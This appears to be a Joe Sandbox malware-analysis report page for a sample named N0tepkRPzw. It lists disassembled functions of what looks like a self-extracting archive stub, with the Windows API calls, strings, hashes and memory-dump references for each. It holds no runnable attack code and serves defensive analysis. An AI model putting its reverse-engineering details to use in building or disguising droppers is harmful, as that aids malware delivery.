Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1201351596-3298887752
Opcode ID: 55849184a8abd35bbe0b7b2a739e7dbcdaf20595bbe26a4d443d69d2619c7ecb
Instruction ID: af92b68ceb2f98d6c828c5077e703c5132abeefa16053683ed5546eb78857e3b
Opcode Fuzzy Hash: 55849184a8abd35bbe0b7b2a739e7dbcdaf20595bbe26a4d443d69d2619c7ecb
Instruction Fuzzy Hash: C7D16EB1118384ABD731AF60D849B9FBBE8FF85B04F10491DF68D96340DBB096488B72

Function 00D6BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00D6BDFA

Part of subcall function 00D6AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D6AAFE

SetWindowTextW.USER32(?,?), ref: 00D6C127
_wcsrchr.LIBVCRUNTIME ref: 00D6C2B1
GetDlgItem.USER32(?,00000066), ref: 00D6C2EC
SetWindowTextW.USER32(00000000,?), ref: 00D6C2FC
SendMessageW.USER32(00000000,00000143,00000000,00D9A472), ref: 00D6C30A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D6C335

Strings

<br>, xrefs: 00D6C08A
ProgramFilesDir, xrefs: 00D6C1FB
%s.%d.tmp, xrefs: 00D6BFF6
Software\Microsoft\Windows\CurrentVersion, xrefs: 00D6C1D0

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: 8a24102d7571bae4454d96ff7d8a5b57d933c2089f412e105f4e953f610e0e79
Instruction ID: 367993893824f4a3d66a0287da9c93e156c886ed815f7a630dfbe06b9807f1e4
Opcode Fuzzy Hash: 8a24102d7571bae4454d96ff7d8a5b57d933c2089f412e105f4e953f610e0e79
Instruction Fuzzy Hash: 93E16D72D00218ABDB25EBA4DC45EEF73BCEF08311F5441A6F949E3151EB749A888B70

Function 00D5D341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00D5D346
_wcschr.LIBVCRUNTIME ref: 00D5D367
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00D5D328,?), ref: 00D5D382
__fprintf_l.LIBCMT ref: 00D5D873

Part of subcall function 00D6137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D5B652,00000000,?,?,?,0001047C), ref: 00D61396

Strings

@%s:, xrefs: 00D5D85D, 00D5D869
,, xrefs: 00D5D8AE
, xrefs: 00D5D67A
*messages***, xrefs: 00D5D49A
RTL, xrefs: 00D5D838
R, xrefs: 00D5D4E5
a, xrefs: 00D5D4EF
$%s:, xrefs: 00D5D856
*messages***, xrefs: 00D5D4D3

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-980926923
Opcode ID: e091796a0f148ad761b015fcb86c25dc1d932e816adaf46e8e6b54eaa834079a
Instruction ID: 7c7115d0aa16a8e757374d1c28a3af807376092cd33cbf06fc0692b91e0e1f19
Opcode Fuzzy Hash: e091796a0f148ad761b015fcb86c25dc1d932e816adaf46e8e6b54eaa834079a
Instruction Fuzzy Hash: 2612A2719002199EDF34EFA4D881BEEB7B6EF04701F14456AED46A7291EB709A48CB70

Function 00D6CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D6AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6AC85
Part of subcall function 00D6AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6AC96
Part of subcall function 00D6AC74: IsDialogMessageW.USER32(0001047C,?), ref: 00D6ACAA
Part of subcall function 00D6AC74: TranslateMessage.USER32(?), ref: 00D6ACB8
Part of subcall function 00D6AC74: DispatchMessageW.USER32(?), ref: 00D6ACC2

GetDlgItem.USER32(00000068,00DAECB0), ref: 00D6CB6E
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00D6A632,00000001,?,?,00D6AECB,00D84F88,00DAECB0), ref: 00D6CB96
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D6CBA1
SendMessageW.USER32(00000000,000000C2,00000000,00D835B4), ref: 00D6CBAF
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D6CBC5
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D6CBDF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D6CC23
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D6CC31
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D6CC40
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D6CC67
SendMessageW.USER32(00000000,000000C2,00000000,00D8431C), ref: 00D6CC76

Strings

\, xrefs: 00D6CBCF

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: e352e0b7c0fe8130515790e6077f9fa430d03761ab42cac0582c5e231c3bdfbb
Instruction ID: 9596c30f71faaf4b7bd19e5d02ca0a6e39c8a37f06f46d48668bd66f88f14344
Opcode Fuzzy Hash: e352e0b7c0fe8130515790e6077f9fa430d03761ab42cac0582c5e231c3bdfbb
Instruction Fuzzy Hash: 3A31B072585341EFD301EF20DC8AFBB7EACEB42704F000609F691D6291DB644908DB76

Function 00D6CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(?), ref: 00D6CF54
ShowWindow.USER32(?,00000000), ref: 00D6CF93
GetExitCodeProcess.KERNEL32(?,?), ref: 00D6CFCF
CloseHandle.KERNEL32(?), ref: 00D6CFF5
ShowWindow.USER32(?,00000001), ref: 00D6D084

Part of subcall function 00D617AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D5BB05,00000000,.exe,?,?,00000800,?,?,00D685DF,?), ref: 00D617C2

Strings

.exe, xrefs: 00D6CFFF
.inf, xrefs: 00D6CF10
, xrefs: 00D6CEA2

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: d701557215bbc2db896318337480ebcd77ca477750f4835c3e62ef3707e37c66
Instruction ID: 41988e520b240d076a50b8effbebcf6e7cfd4a6dfbde0c6825c0d9fe4d892647
Opcode Fuzzy Hash: d701557215bbc2db896318337480ebcd77ca477750f4835c3e62ef3707e37c66
Instruction Fuzzy Hash: 8061E3709143809BDB319F24E804ABBBBF6EF85344F08581AF4C597255D7B2D989CB72

Function 00D7A058 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D74E35,00D74E35,?,?,?,00D7A2A9,00000001,00000001,3FE85006), ref: 00D7A0B2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D7A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00D7A138
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D7A232
__freea.LIBCMT ref: 00D7A23F

Part of subcall function 00D78518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7C13D,00000000,?,00D767E2,?,00000008,?,00D789AD,?,?,?), ref: 00D7854A

__freea.LIBCMT ref: 00D7A248
__freea.LIBCMT ref: 00D7A26D

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: da7781c619d176faef495db4322656af15c7f52d515b4e4db68c2064e2ab9f05
Instruction ID: 1f66b08920160571e3f53ce7f76693d43af8cb9c93a059e2f0f7700621f7fa56
Opcode Fuzzy Hash: da7781c619d176faef495db4322656af15c7f52d515b4e4db68c2064e2ab9f05
Instruction Fuzzy Hash: C451F172610216AFEB259F68CC41EBF77A9EB81750F198629FC08D6181FB35DC40C6B6

Function 00D6A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D60085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D600A0
Part of subcall function 00D60085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5EB86,Crypt32.dll,00000000,00D5EC0A,?,?,00D5EBEC,?,?,?), ref: 00D600C2

OleInitialize.OLE32(00000000), ref: 00D6A34E
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D6A385
SHGetMalloc.SHELL32(00D98430), ref: 00D6A38F

Strings

3To, xrefs: 00D6A366
riched20.dll, xrefs: 00D6A33D

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3To
API String ID: 3498096277-2168385784
Opcode ID: 5df73a73128f3ed64e546a874cdd953edf7b682c836d8345a97357221184db52
Instruction ID: 5afd72ce86b590cb25a54bdbc93197d5066e5be5059c393f97ce45c78a8c99a9
Opcode Fuzzy Hash: 5df73a73128f3ed64e546a874cdd953edf7b682c836d8345a97357221184db52
Instruction Fuzzy Hash: 97F0ECB5900209EBCB10AF9998499EFFBFCEF95701F00415AE814E2211DBB456058BB1

Function 00D599B0 Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00D578AD,?,00000005,?,00000011), ref: 00D59A4C
GetLastError.KERNEL32(?,?,00D578AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D59A59
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00D578AD,?,00000005,?), ref: 00D59A8E
GetLastError.KERNEL32(?,?,00D578AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D59A96
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00D578AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D59ADB

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 0db76dd0eebe0f5978f3f3aa9e7a47c17ed9d4ca6cc7e45c8affe750754cdcf6
Instruction ID: f32a7950ee4facb3335adc0da902efe8a236824af63234f2109884ce5a2aad51
Opcode Fuzzy Hash: 0db76dd0eebe0f5978f3f3aa9e7a47c17ed9d4ca6cc7e45c8affe750754cdcf6
Instruction Fuzzy Hash: 07412170544746AFEB208F20CC06BDAFBD4EB01325F140719FDA8962D1E7B5A98C8BB1

Function 00D6AC74 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6AC85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6AC96
IsDialogMessageW.USER32(0001047C,?), ref: 00D6ACAA
TranslateMessage.USER32(?), ref: 00D6ACB8
DispatchMessageW.USER32(?), ref: 00D6ACC2

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 62dcbae21ae2ca1e64ee5f908772c9729a0ca495183b108591c4b324dd120bb9
Instruction ID: eae109be3752ad6fbc1636600ef225270e915518eb354ac672ee94756a4b1921
Opcode Fuzzy Hash: 62dcbae21ae2ca1e64ee5f908772c9729a0ca495183b108591c4b324dd120bb9
Instruction Fuzzy Hash: 0BF0D072D01229EBCB20ABE6DC4CDEB7F6CEE057917454615F915D2210EB34D505CBB1

Function 00D6A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00D6A2DE
SHAutoComplete.SHLWAPI(?,00000010), ref: 00D6A315

Part of subcall function 00D617AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D5BB05,00000000,.exe,?,?,00000800,?,?,00D685DF,?), ref: 00D617C2

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D6A305

Strings

EDIT, xrefs: 00D6A2E9, 00D6A2F4, 00D6A301

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: bcf3faa190c5a8f275515e6e7753d48d85898c859942275bc0b27e738adf34e5
Instruction ID: db3477cbcd21acca7691dc179ec2720325fac77620ce435978d9de966727977f
Opcode Fuzzy Hash: bcf3faa190c5a8f275515e6e7753d48d85898c859942275bc0b27e738adf34e5
Instruction Fuzzy Hash: CBF08232A01328B7E72066689C05FEB77AC9B46B51F480256BD45F6380D7609D45CAF6

Function 00D6D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D6D29D
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D6D2D9

Strings

sfxpar, xrefs: 00D6D2D4
sfxcmd, xrefs: 00D6D298

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 5b5319d156e3e84e0df1a4c5e40dbd8b2f3b223a6508f1cab61f1c0f69cc95bd
Instruction ID: b35f229ead9446f1546873a0fd39597549a859dc1bbaba7239b67325113288e9
Opcode Fuzzy Hash: 5b5319d156e3e84e0df1a4c5e40dbd8b2f3b223a6508f1cab61f1c0f69cc95bd
Instruction Fuzzy Hash: 01F0A072D11328A7CB202F90AC1AEBE7B99EF09B42B040021FC88A6241D660CD44DBF5

Function 00D5984E Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00D5985E
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00D59876
GetLastError.KERNEL32 ref: 00D598A8
GetLastError.KERNEL32 ref: 00D598C7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 30a3b3189935449a9a5923b1f6c4741a7590922da83c10226e0d471f6f535e9e
Instruction ID: 6650b562795bdcd98ec324e53abbfba8ce6efd7b1c171525b107757b0cdfdbaa
Opcode Fuzzy Hash: 30a3b3189935449a9a5923b1f6c4741a7590922da83c10226e0d471f6f535e9e
Instruction Fuzzy Hash: 26117C30900704EBDF205F51C824A69BFA9EB16732F28862AFC6AC5690D735DE489F71

Function 00D7A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00D73713,00000000,00000000,?,00D7A49B,00D73713,00000000,00000000,00000000,?,00D7A698,00000006,FlsSetValue), ref: 00D7A526
GetLastError.KERNEL32(?,00D7A49B,00D73713,00000000,00000000,00000000,?,00D7A698,00000006,FlsSetValue,00D87348,00D87350,00000000,00000364,?,00D79077), ref: 00D7A532
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D7A49B,00D73713,00000000,00000000,00000000,?,00D7A698,00000006,FlsSetValue,00D87348,00D87350,00000000), ref: 00D7A540

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
